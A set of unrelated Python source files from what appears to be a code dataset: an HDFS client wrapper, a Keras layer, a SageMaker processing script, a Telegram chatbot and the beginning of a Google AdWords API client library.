returncode, output, errors = self.__run_hdfs_cmd(dir_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path: {} failed is not a directory".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} successfully is a directory".format(
hdfs_path))
return True
def delete(self, hdfs_path):
"""
Remove a file or directory from HDFS.
whether the remote HDFS path exists
Args:
hdfs_path: HDFS path.
Returns:
True or False
This function returns `True` if the deletion was successful and `False` if
no file or directory previously existed at `hdfs_path`.
"""
_logger.info('Deleting %r.', hdfs_path)
if not self.is_exist(hdfs_path):
_logger.warn("HDFS path: {} do not exist".format(hdfs_path))
return True
if self.is_dir(hdfs_path):
del_cmd = ['-rmr', hdfs_path]
else:
del_cmd = ['-rm', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(del_cmd, retry_times=0)
if returncode:
_logger.error("HDFS path: {} delete files failure".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} delete files successfully".format(
hdfs_path))
return True
def rename(self, hdfs_src_path, hdfs_dst_path, overwrite=False):
"""
Move a file or folder on HDFS.
Args:
hdfs_path(str): HDFS path.
overwrite(bool|False): If the path already exists and overwrite is False, will return False.
Returns:
True or False
"""
assert hdfs_src_path is not None
assert hdfs_dst_path is not None
if not self.is_exist(hdfs_src_path):
_logger.info("HDFS path do not exist: {}".format(hdfs_src_path))
if self.is_exist(hdfs_dst_path) and not overwrite:
_logger.error("HDFS path is exist: {} and overwrite=False".format(
hdfs_dst_path))
rename_command = ['-mv', hdfs_src_path, hdfs_dst_path]
returncode, output, errors = self.__run_hdfs_cmd(
rename_command, retry_times=1)
if returncode:
_logger.error("HDFS rename path: {} to {} failed".format(
hdfs_src_path, hdfs_dst_path))
return False
else:
_logger.info("HDFS rename path: {} to {} successfully".format(
hdfs_src_path, hdfs_dst_path))
return True
@staticmethod
def make_local_dirs(local_path):
"""
create a directiory local, is same to mkdir
Args:
local_path: local path that wants to create a directiory.
"""
try:
os.makedirs(local_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def makedirs(self, hdfs_path):
"""
Create a remote directory, recursively if necessary.
Args:
hdfs_path(str): Remote path. Intermediate directories will be created appropriately.
Returns:
True or False
"""
_logger.info('Creating directories to %r.', hdfs_path)
assert hdfs_path is not None
if self.is_exist(hdfs_path):
_logger.error("HDFS path is exist: {}".format(hdfs_path))
return
mkdirs_commands = ['-mkdir', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
mkdirs_commands, retry_times=1)
if returncode:
_logger.error("HDFS mkdir path: {} failed".format(hdfs_path))
return False
else:
_logger.error("HDFS mkdir path: {} successfully".format(hdfs_path))
return True
def ls(self, hdfs_path):
"""
ls directory contents about HDFS hdfs_path
Args:
hdfs_path(str): Remote HDFS path will be ls.
Returns:
List: a contents list about hdfs_path.
"""
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-ls', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list path: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list path: {} successfully".format(hdfs_path))
ret_lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
ret_lines.append(re_line[7])
return ret_lines
def lsr(self, hdfs_path, only_file=True, sort=True):
"""
list directory contents about HDFS hdfs_path recursively
Args:
hdfs_path(str): Remote HDFS path.
only_file(bool|True): will discard folders.
sort(bool|True): will be sorted by create time.
Returns:
List: a contents list about hdfs_path.
"""
def sort_by_time(v1, v2):
v1_time = datetime.strptime(v1[1], '%Y-%m-%d %H:%M')
v2_time = datetime.strptime(v2[1], '%Y-%m-%d %H:%M')
return v1_time > v2_time
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-lsr', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list all files: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list all files: {} successfully".format(
hdfs_path))
lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
if only_file and re_line[0][0] == "d":
continue
else:
lines.append(
(re_line[7], re_line[5] + " " + re_line[6]))
if sort:
sorted(lines, cmp=sort_by_time)
ret_lines = [ret[0] for ret in lines]
return ret_lines
def multi_download(client,
hdfs_path,
local_path,
trainer_id,
trainers,
multi_processes=5):
"""
Download files from HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
trainer_id(int): current trainer id
trainers(int): all trainers number
multi_processes(int|5): the download data process at the same time, default=5
Returns:
List:
Download files in local folder.
"""
def __subprocess_download(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
sub_local_re_path = local_path
else:
sub_local_re_path = os.path.join(local_path, re_path)
client.download(data, sub_local_re_path)
assert isinstance(client, HDFSClient)
client.make_local_dirs(local_path)
_logger.info("Make local dir {} successfully".format(local_path))
all_need_download = client.lsr(hdfs_path, sort=True)
need_download = all_need_download[trainer_id::trainers]
_logger.info("Get {} files From all {} files need to be download from {}".
format(len(need_download), len(all_need_download), hdfs_path))
_logger.info("Start {} multi process to download datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = need_download[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_download, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to download datas".format(
multi_processes))
local_downloads = []
for data in need_download:
data_name = os.path.basename(data)
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
local_re_path = os.path.join(local_path, data_name)
else:
local_re_path = os.path.join(local_path, re_path, data_name)
local_downloads.append(local_re_path)
return local_downloads
def getfilelist(path):
rlist = []
for dir, folder, file in os.walk(path):
for i in file:
t = os.path.join(dir, i)
rlist.append(t)
for r in rlist:
print(r)
def multi_upload(client,
hdfs_path,
local_path,
multi_processes=5,
overwrite=False,
sync=True):
"""
Upload files to HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
multi_processes(int|5): the upload data process at the same time, default=5
overwrite(bool|False): will overwrite file on HDFS or not
sync(bool|True): upload files sync or not.
Returns:
None
"""
def __subprocess_upload(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), local_path)
hdfs_re_path = os.path.join(hdfs_path, re_path)
client.upload(hdfs_re_path, data, overwrite, retry_times=5)
def get_local_files(path):
rlist = []
if not os.path.isdir(path):
return rlist
for dirname, folder, files in os.walk(path):
for i in files:
t = os.path.join(dirname, i)
rlist.append(t)
return rlist
assert isinstance(client, HDFSClient)
all_files = get_local_files(local_path)
if not all_files:
_logger.info("there are nothing need to upload, exit")
return
_logger.info("Start {} multi process to upload datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = all_files[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_upload, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to upload datas".format(
multi_processes))
if __name__ == "__main__":
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
downloads = multi_download(
client,
"/user/com/train-25/model",
"/home/xx/data1",
1,
5,
100,
multi_processes=5)
multi_upload(client, "/user/com/train-25/model", "/home/xx/data1")
| StarcoderdataPython |
4801516 | #does not work
import numpy as np
import math
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer,Dense, Activation
import tensorflow.keras as keras# as k
import tensorflow as t
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam,SGD
from tensorflow.linalg import trace
class gcomdex(Layer):#creates ordering by last param (returns indices)
def __init__(self,gs=20,param=40,**kwargs):
self.gs=gs
self.param=param
super(gcomdex,self).__init__(**kwargs)
def build(self, input_shape):
self.built=True
def call(self,x):
x=x[0]
values=x[:,:,-1]#K.reshape(K.dot(x,self.metrik),(-1,self.gs))
_,valueorder=t.math.top_k(values,k=self.gs)
valueorder=K.cast(valueorder,"float32")
return valueorder
def compute_output_shape(self,input_shape):
input_shape=input_shape[0]
assert len(input_shape)==3
assert input_shape[1]==self.gs
assert input_shape[2]==self.param
return tuple([input_shape[0],self.gs])
def get_config(self):
mi={"gs":self.gs,"param":self.param}
th=super(gcomdex,self).get_config()
th.update(mi)
return th
def from_config(config):
return gcomdex(**config)
| StarcoderdataPython |
3333979 | from pmaf.pipe.specs._metakit import SpecificationCompositeMetabase,SpecificationBackboneMetabase
from pmaf.pipe.specs._base import SpecificationBase
class SpecificationCompositeBase(SpecificationBase,SpecificationCompositeMetabase):
""""""
def __init__(self, _specs,_steps):
if not all([isinstance(spec,SpecificationBackboneMetabase) for spec in _specs]):
raise TypeError('`_specs` contain element with invalid type.')
tmp_factors = set([spec.factor for spec in _specs])
if len(tmp_factors)!=1:
raise RuntimeError('Composite specification may contain only one factor.')
self.__specs = _specs
self.__factor = tmp_factors.pop()
self.__steps =_steps
def verify_docker(self, docker):
return self.__specs[0].verify_docker(docker)
@property
def specs(self):
"""List of joined and ordered :term:`specs<spec>`"""
return self.__specs
@property
def state(self):
return all([spec.state for spec in self.__specs])
@property
def factor(self):
return self.__factor
@property
def steps(self):
return self.__steps
| StarcoderdataPython |
3328326 | <filename>aws/production_experiment/preprocess/run_processing_job.py
"""
runs script train_val_test_split on an ec2 instance as a sagemaker processing job
"""
from sagemaker.processing import ScriptProcessor, ProcessingInput, ProcessingOutput
import sagemaker
import boto3
## locations and vars
BUCKET = sagemaker.Session().default_bucket()
INPUT_FOLDER = 'stock-data-raw-csv'
OUTPUT_FOLDER = 'DEMO-xgboost-as-a-built-in-algo'
ROLE_ARN = sagemaker.get_execution_role()
## image uri code
ACCOUNT_ID = boto3.client('sts').get_caller_identity().get('Account')
REGION = boto3.Session().region_name
ECR_REPOSITORY = 'sagemaker-processing-container'
TAG = ':latest'
IMAGE_URI = '{}.dkr.ecr.{}.amazonaws.com/{}'.format(ACCOUNT_ID, REGION, ECR_REPOSITORY + TAG)
## call processing job
script_processor = ScriptProcessor(command=['python3'],
image_uri=IMAGE_URI,
role=ROLE_ARN,
instance_count=1,
instance_type='ml.m5.xlarge')
script_processor.run(code='train_val_test_split.py',
inputs=[ProcessingInput(
source=f's3://{BUCKET}/{INPUT_FOLDER}/',
destination='/opt/ml/processing/input')],
outputs=[ProcessingOutput(source='/opt/ml/processing/output/train',
destination=f's3://{BUCKET}/{OUTPUT_FOLDER}/train'),
ProcessingOutput(source='/opt/ml/processing/output/validation',
destination=f's3://{BUCKET}/{OUTPUT_FOLDER}/validation'),
ProcessingOutput(source='/opt/ml/processing/output/test',
destination=f's3://{BUCKET}/{OUTPUT_FOLDER}/test')])
| StarcoderdataPython |
3292846 | """
重点代码 !!
练习4: 假设在当前文件夹下有一个图片timg.jfif
请编写一个函数,将该文件名传入,通过执行函数将其
复制一份到 主目录下
注意: 考虑可能文件比较大,不允许一次性读取
逻辑提示: 边从原来的文件读取内容,再将内容写入新文件
"""
def copy(filename):
"""
:param filename: 要拷贝的文件
"""
fr = open(filename, 'rb') # 原文件
fw = open("/home/tarena/" + filename, 'wb')
# 边读边写
while True:
data = fr.read(1024)
# 如果读取到空,则表示文件拷贝结束
if not data:
break
fw.write(data)
fr.close()
fw.close()
copy("timg.jfif") | StarcoderdataPython |
3333272 | # Setting up Chatterbot
import os
import json
import random
import dateutil.parser
from chatterbot import ChatBot
from chatterbot.trainers import ListTrainer
# Train the bot
english_bot = ChatBot("English Bot",
storage_adapter="chatterbot.storage.SQLStorageAdapter",
database_uri=os.environ.get("DATABASE_URL"))
# Setting telegram things
tg_token = os.environ.get("BOT_TOKEN")
import logging
from telegram.ext import CommandHandler, MessageHandler, Filters, Updater
updater = Updater(token=tg_token)
dispatcher = updater.dispatcher
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
def start(bot, update):
bot.send_message(chat_id=update.message.chat_id, text="Olá :)")
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
def reply(bot, update):
userText = str(update.message.text)
botName = bot.name
is_reply_to_bot = False
if update.message.reply_to_message is not None:
# Train message responses
train_data = [update.message.reply_to_message.text, update.message.text]
list_trainer = ListTrainer(english_bot)
list_trainer.train(train_data)
is_reply_to_bot = update.message.reply_to_message.from_user.username == bot.username
answer = str(english_bot.get_response(userText))
# TODO: Move answer probability to a config file
if random.random() <= 0.15 or botName in userText or is_reply_to_bot:
bot.send_message(chat_id=update.message.chat_id, text=answer)
reply_handler = MessageHandler(Filters.text, reply)
dispatcher.add_handler(reply_handler)
def train(bot, update):
file = bot.getFile(update.message.document.file_id)
rawData = file.download_as_bytearray()
data = rawData.decode('utf8')
messages = json.loads(data)
train_data = []
list_trainer = ListTrainer(english_bot)
last_date = None
message_dict = dict()
for message in messages["messages"]:
if message["text"] is str:
train_data.append(message["text"])
message_dict[message["id"]] = message["text"]
if "reply_to_message_id" in message and message["reply_to_message_id"] in message_dict:
prev_message = message_dict[message["reply_to_message_id"]]
pair = [prev_message, message["text"]]
list_trainer.train(pair)
date = dateutil.parser.parse(message["date"])
if last_date is not None:
diff = date - last_date
if diff.seconds >= 60 * 60 * 4:
list_trainer.train(train_data)
train_data = []
last_date = date
train_handler = MessageHandler(Filters.document, train)
dispatcher.add_handler(train_handler)
def setup_webhook(updater, token):
webhook = os.environ.get('WEBHOOK')
port = int(os.environ.get('PORT', '8443'))
updater.start_webhook(listen="0.0.0.0",
port=port,
url_path=token)
updater.bot.set_webhook(webhook + token)
setup_webhook(updater, tg_token)
updater.idle()
| StarcoderdataPython |
49347 | <gh_stars>1-10
#!/usr/bin/python
#
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface for accessing all other services."""
__author__ = '<EMAIL> (<NAME>)'
import os
import re
import thread
import time
from adspygoogle.adwords import AdWordsSanityCheck
from adspygoogle.adwords import AUTH_TOKEN_SERVICE
from adspygoogle.adwords import DEFAULT_API_VERSION
from adspygoogle.adwords import LIB_SHORT_NAME
from adspygoogle.adwords import LIB_SIG
from adspygoogle.adwords import REQUIRED_SOAP_HEADERS
from adspygoogle.adwords.AdWordsErrors import AdWordsError
from adspygoogle.adwords.GenericAdWordsService import GenericAdWordsService
from adspygoogle.adwords.ReportDownloader import ReportDownloader
from adspygoogle.common import SanityCheck
from adspygoogle.common import Utils
from adspygoogle.common.Client import Client
from adspygoogle.common.Errors import AuthTokenError
from adspygoogle.common.Errors import ValidationError
from adspygoogle.common.Logger import Logger
class AdWordsClient(Client):
"""Provides entry point to all web services.
Allows instantiation of all AdWords API web services.
"""
auth_pkl_name = 'adwords_api_auth.pkl'
config_pkl_name = 'adwords_api_config.pkl'
def __init__(self, headers=None, config=None, path=None,
login_token=None, login_captcha=None):
"""Inits AdWordsClient.
Args:
[optional]
headers: dict Object with populated authentication credentials.
config: dict Object with client configuration values.
path: str Relative or absolute path to home directory (i.e. location of
pickles and logs/).
login_token: str Token representing the specific CAPTCHA challenge.
login_captcha: str String entered by the user as an answer to a CAPTCHA
challenge.
Example:
headers = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'authToken': '...',
'clientCustomerId': '1234567890',
'userAgent': 'GoogleTest',
'developerToken': '<EMAIL>++<PASSWORD>',
'validateOnly': 'n',
'partialFailure': 'n',
'oauth_credentials': {
'oauth_consumer_key': ...,
'oauth_consumer_secret': ...,
'oauth_token': ...,
'oauth_token_secret': ...
},
'oauth2credentials': 'See use_oauth2.py'.
}
config = {
'home': '/path/to/home',
'log_home': '/path/to/logs/home',
'proxy': 'http://example.com:8080',
'xml_parser': 1, # PYXML = 1, ELEMENTREE = 2
'debug': 'n',
'raw_debug': 'n',
'xml_log': 'y',
'request_log': 'y',
'raw_response': 'n',
'strict': 'y',
'pretty_xml': 'y',
'compress': 'y',
'access': ''
}
path = '/path/to/home'
"""
super(AdWordsClient, self).__init__(headers, config, path)
self.__lock = thread.allocate_lock()
self.__loc = None
if path is not None:
# Update absolute path for a given instance of AdWordsClient, based on
# provided relative path.
if os.path.isabs(path):
AdWordsClient.home = path
else:
# NOTE(api.sgrinberg): Keep first parameter of join() as os.getcwd(),
# do not change it to AdWordsClient.home. Otherwise, may break when
# multiple instances of AdWordsClient exist during program run.
AdWordsClient.home = os.path.join(os.getcwd(), path)
# If pickles don't exist at given location, default to "~".
if (not headers and not config and
(not os.path.exists(os.path.join(AdWordsClient.home,
AdWordsClient.auth_pkl_name)) or
not os.path.exists(os.path.join(AdWordsClient.home,
AdWordsClient.config_pkl_name)))):
AdWordsClient.home = os.path.expanduser('~')
else:
AdWordsClient.home = os.path.expanduser('~')
# Update location for both pickles.
AdWordsClient.auth_pkl = os.path.join(AdWordsClient.home,
AdWordsClient.auth_pkl_name)
AdWordsClient.config_pkl = os.path.join(AdWordsClient.home,
AdWordsClient.config_pkl_name)
# Only load from the pickle if config wasn't specified.
self._config = config or self.__LoadConfigValues()
self._config = self.__SetMissingDefaultConfigValues(self._config)
self._config['home'] = AdWordsClient.home
# Validate XML parser to use.
SanityCheck.ValidateConfigXmlParser(self._config['xml_parser'])
# Initialize units and operations for current instance of AdWordsClient
# object (using list to take advantage of Python's pass-by-reference).
self._config['units'] = [0]
self._config['operations'] = [0]
self._config['last_units'] = [0]
self._config['last_operations'] = [0]
# Only load from the pickle if 'headers' wasn't specified.
if headers is None:
self._headers = self.__LoadAuthCredentials()
else:
if Utils.BoolTypeConvert(self._config['strict']):
SanityCheck.ValidateRequiredHeaders(headers, REQUIRED_SOAP_HEADERS)
self._headers = headers
# Internally, store user agent as 'userAgent'.
if 'useragent' in self._headers:
self._headers['userAgent'] = self._headers['useragent']
self._headers = Utils.UnLoadDictKeys(self._headers, ['useragent'])
if Utils.BoolTypeConvert(self._config['strict']):
SanityCheck.ValidateRequiredHeaders(self._headers,
REQUIRED_SOAP_HEADERS)
# Load validateOnly header, if one was set.
if 'validateOnly' in self._headers:
self._headers['validateOnly'] = str(Utils.BoolTypeConvert(
self._headers['validateOnly'])).lower()
# Load partialFailure header, if one was set.
if 'partialFailure' in self._headers:
self._headers['partialFailure'] = str(Utils.BoolTypeConvert(
self._headers['partialFailure'])).lower()
# Load/set authentication token.
if self._headers.get('authToken'):
# If they have a non-empty authToken, set the epoch and skip the rest.
self._config['auth_token_epoch'] = time.time()
elif (self._headers.get('oauth_credentials') or
self._headers.get('oauth2credentials')):
# If they have oauth_credentials, that's also fine.
pass
elif (self._headers.get('email') and self._headers.get('password')
and not self._headers.get('authToken')):
# If they have a non-empty email and password but no or empty authToken,
# generate an authToken.
try:
self._headers['authToken'] = Utils.GetAuthToken(
self._headers['email'], self._headers['password'],
AUTH_TOKEN_SERVICE, LIB_SIG, self._config['proxy'], login_token,
login_captcha)
self._config['auth_token_epoch'] = time.time()
except AuthTokenError, e:
# We would end up here if non-valid Google Account's credentials were
# specified.
raise ValidationError('Was not able to obtain an AuthToken for '
'provided email and password, see root_cause.', e)
else:
# We need either oauth_credentials OR authToken.
raise ValidationError('Authentication data is missing.')
# Insert library's signature into user agent.
if self._headers['userAgent'].rfind(LIB_SIG) == -1:
# Make sure library name shows up only once.
if self._headers['userAgent'].rfind(LIB_SHORT_NAME) > -1:
pattern = re.compile('.*' + LIB_SHORT_NAME + '.*?\|')
self._headers['userAgent'] = pattern.sub(
'', self._headers['userAgent'], 1)
self._headers['userAgent'] = (
'%s%s' % (self._headers['userAgent'], LIB_SIG))
self.__is_mcc = False
# Initialize logger.
self.__logger = Logger(LIB_SIG, self._config['log_home'])
def __LoadAuthCredentials(self):
"""Load existing authentication credentials from adwords_api_auth.pkl.
Returns:
dict Dictionary object with populated authentication credentials.
"""
return super(AdWordsClient, self)._LoadAuthCredentials()
def __WriteUpdatedAuthValue(self, key, new_value):
"""Write updated authentication value for a key in adwords_api_auth.pkl.
Args:
key: str Key to update.
new_value: str New value to update the key with.
"""
super(AdWordsClient, self)._WriteUpdatedAuthValue(key, new_value)
def __LoadConfigValues(self):
"""Load existing configuration values from adwords_api_config.pkl.
Returns:
dict Dictionary object with populated configuration values.
"""
return super(AdWordsClient, self)._LoadConfigValues()
def __SetMissingDefaultConfigValues(self, config=None):
"""Set default configuration values for missing elements in the config dict.
Args:
config: dict Object with client configuration values.
Returns:
dict A config dictionary with default values set.
"""
if config is None: config = {}
config = super(AdWordsClient, self)._SetMissingDefaultConfigValues(config)
default_config = {
'home': AdWordsClient.home,
'log_home': os.path.join(AdWordsClient.home, 'logs')
}
for key in default_config:
if key not in config:
config[key] = default_config[key]
return config
def GetUnits(self):
"""Return number of API units consumed by current instance of AdWordsClient
object.
Returns:
int Number of API units.
"""
return self._config['units'][0]
def GetOperations(self):
"""Return number of API ops performed by current instance of AdWordsClient
object.
Returns:
int Number of API operations.
"""
return self._config['operations'][0]
def GetLastUnits(self):
"""Return number of API units consumed by last API call.
Returns:
int Number of API units.
"""
return self._config['last_units'][0]
def GetLastOperations(self):
"""Return number of API ops performed by last API call.
Returns:
int Number of API operations.
"""
return self._config['last_operations'][0]
def UseMcc(self, state):
"""Choose to make an API request against MCC account or a sub-account.
Args:
state: bool State of the API request, whether to use MCC.
"""
self.__is_mcc = False
if state:
self.__is_mcc = True
def __GetUseMcc(self):
"""Return current state of the API request.
Returns:
bool State of the API request, whether to use MCC.
"""
return self.__is_mcc
def __SetUseMcc(self, state):
"""Chooses to make an API request against MCC account or a sub-account.
Args:
state: bool State of the API request, whether to use MCC.
"""
self.__is_mcc = state
use_mcc = property(__GetUseMcc, __SetUseMcc)
def SetClientCustomerId(self, client_customer_id):
"""Temporarily change client customer id for a given AdWordsClient instance.
Args:
client_customer_id: str New client customer id to use.
"""
if ('clientCustomerId' not in self._headers or
self._headers['clientCustomerId'] != client_customer_id):
self._headers['clientCustomerId'] = client_customer_id
def __GetValidateOnly(self):
"""Return current state of the validation mode.
Returns:
bool State of the validation mode.
"""
return self._headers['validateOnly']
def __SetValidateOnly(self, value):
"""Temporarily change validation mode for a given AdWordsClient instance.
Args:
value: mixed New state of the validation mode using BoolTypeConvert.
"""
self._headers['validateOnly'] = str(Utils.BoolTypeConvert(value)).lower()
validate_only = property(__GetValidateOnly, __SetValidateOnly)
def __GetPartialFailure(self):
"""Return current state of the partial failure mode.
Returns:
bool State of the partial failure mode.
"""
return self._headers['partialFailure']
def __SetPartialFailure(self, value):
"""Temporarily change partial failure mode for a given AdWordsClient
instance.
Args:
value: mixed New state of the partial failure mode using BoolTypeConvert.
"""
self._headers['partialFailure'] = str(Utils.BoolTypeConvert(value)).lower()
partial_failure = property(__GetPartialFailure, __SetPartialFailure)
def __GetAuthCredentialsForAccessLevel(self):
"""Return auth credentials based on the access level of the request.
Request can have an MCC level access or a sub account level access.
Returns:
dict Authentiaction credentials.
"""
old_headers = self.GetAuthCredentials()
new_headers = {}
is_mcc = self.__is_mcc
for key, value in old_headers.iteritems():
new_headers[key] = value
if key == 'clientCustomerId':
if is_mcc and 'email' in old_headers:
new_headers[key] = None
return new_headers
def CallRawMethod(self, soap_message, url, server, http_proxy):
"""Call API method directly, using raw SOAP message.
For API calls performed with this method, outgoing data is not run through
library's validation logic.
Args:
soap_message: str SOAP XML message.
url: str URL of the API service for the method to call.
server: str API server to access for this API call.
http_proxy: str HTTP proxy to use for this API call.
Returns:
tuple Response from the API method (SOAP XML response message).
"""
service_name = url.split('/')[-1]
service = getattr(self, 'Get' + service_name)(server=server,
http_proxy=http_proxy)
return service.CallRawMethod(soap_message)
def GetAdExtensionOverrideService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdExtensionOverrideService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdExtensionOverrideService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdExtensionOverrideService')
def GetAdGroupAdService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdGroupAdService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdGroupAdService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdGroupAdService')
def GetAdGroupCriterionService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdGroupCriterionService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdGroupCriterionService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdGroupCriterionService')
def GetAdGroupService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdGroupService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdGroupService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdGroupService')
def GetAdParamService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdParamService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdParamService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdParamService')
def GetAlertService(self, server='https://adwords.google.com', version=None,
http_proxy=None):
"""Call API method in AlertService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AlertService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'mcm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AlertService')
def GetBidLandscapeService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in BidLandscapeService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of BidLandscapeService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
